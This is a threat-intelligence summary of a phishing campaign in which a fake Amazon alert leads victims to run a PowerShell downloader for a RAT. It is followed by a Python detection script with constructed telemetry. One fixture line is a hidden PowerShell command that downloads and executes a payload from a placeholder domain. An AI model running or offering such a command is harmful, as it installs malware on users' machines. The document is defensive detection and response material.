A recent phishing campaign has been uncovered that uses a counterfeit Amazon security alert to deceive victims into executing a PowerShell command. This command downloads a harmful file named mysql.exe, which is actually the HarborWatch Agent RAT. Once activated, the malware communicates with a command-and-control server, transmitting information from the infected host. The campaign cleverly employs look-alike domains and relies on users to inadvertently infect themselves, bypassing conventional attachment-based detection methods. Investigations have traced the operation from the spoofed sender address to the malicious domains, the PowerShell downloader, and ultimately the malware payload. Analysis has revealed that mysql.exe communicates with a server at IP address 185.193.127.44, utilizing specific API paths. Organizations are advised to block these malicious domains and IPs, restrict PowerShell execution, and enhance email security measures to prevent brand impersonation. In case of detection, affected systems should be isolated, the malware process terminated, and forensic evidence collected. Users should be informed about the phishing tactic, and defenses updated to counter similar threats.
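As an added example (not from the original report), the following Python triage script applies the indicators given above to constructed endpoint telemetry: a PowerShell command line that downloads mysql.exe, mysql.exe spawned by PowerShell, and any outbound connection to 185.193.127.44. The log format, hostnames and look-alike domain are assumptions; the C2 API paths are not named in the report, so only the IP is matched.

```python
"""Triage constructed process/network records for the fake-Amazon-alert campaign.

Record formats (assumed, not a real product's schema):
  PROC|<host>|<parent image>|<image>|<command line>
  NET|<host>|<image>|<dst ip>|<dst port>
"""
import re

C2_IPS = {"185.193.127.44"}          # from the report; API paths are not given, so only the IP is used
PAYLOAD_NAME = "mysql.exe"           # the RAT is dropped under this name
DOWNLOAD_CMDLETS = re.compile(
    r"\b(Invoke-WebRequest|iwr|Start-BitsTransfer|DownloadFile|DownloadString|curl|wget)\b", re.I)

# Constructed sample telemetry. The domain is a placeholder for the look-alike domain.
SAMPLE_RECORDS = [
    "PROC|WS01|explorer.exe|powershell.exe|powershell -w hidden -c \"iwr http://amazon-alert.example/"
    "mysql.exe -o $env:TEMP\\mysql.exe; & $env:TEMP\\mysql.exe\"",
    "PROC|WS01|powershell.exe|mysql.exe|C:\\Users\\a\\AppData\\Local\\Temp\\mysql.exe",
    "NET|WS01|mysql.exe|185.193.127.44|443",
    # Benign noise: a real MySQL server and ordinary browsing should not match.
    "PROC|WS02|services.exe|mysqld.exe|\"C:\\Program Files\\MySQL\\bin\\mysqld.exe\" --defaults-file=my.ini",
    "NET|WS02|chrome.exe|142.250.72.14|443",
]


def triage(records):
    """Return (host, rule, detail) for each record matching the campaign's behaviour."""
    findings = []
    for rec in records:
        fields = rec.split("|")
        kind, host = fields[0], fields[1]
        if kind == "PROC":
            parent, image, cmd = fields[2], fields[3], "|".join(fields[4:])
            # Rule 1: PowerShell fetching the payload by name (the user-pasted downloader).
            if image.lower() == "powershell.exe" and DOWNLOAD_CMDLETS.search(cmd) and PAYLOAD_NAME in cmd.lower():
                findings.append((host, "powershell_downloader", cmd))
            # Rule 2: the payload name alone is weak (mysql.exe is also a legitimate client),
            # so require PowerShell as the parent process.
            elif image.lower() == PAYLOAD_NAME and parent.lower() == "powershell.exe":
                findings.append((host, "payload_spawned_by_powershell", cmd))
        elif kind == "NET":
            image, dst_ip, dst_port = fields[2], fields[3], fields[4]
            # Rule 3: any process talking to the reported C2 address.
            if dst_ip in C2_IPS:
                findings.append((host, "c2_connection", f"{image} -> {dst_ip}:{dst_port}"))
    return findings


if __name__ == "__main__":
    for host, rule, detail in triage(SAMPLE_RECORDS):
        print(f"[{host}] {rule}: {detail}")
```

Hosts with a `c2_connection` or `payload_spawned_by_powershell` hit are candidates for the isolate, terminate and collect-evidence steps listed above.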

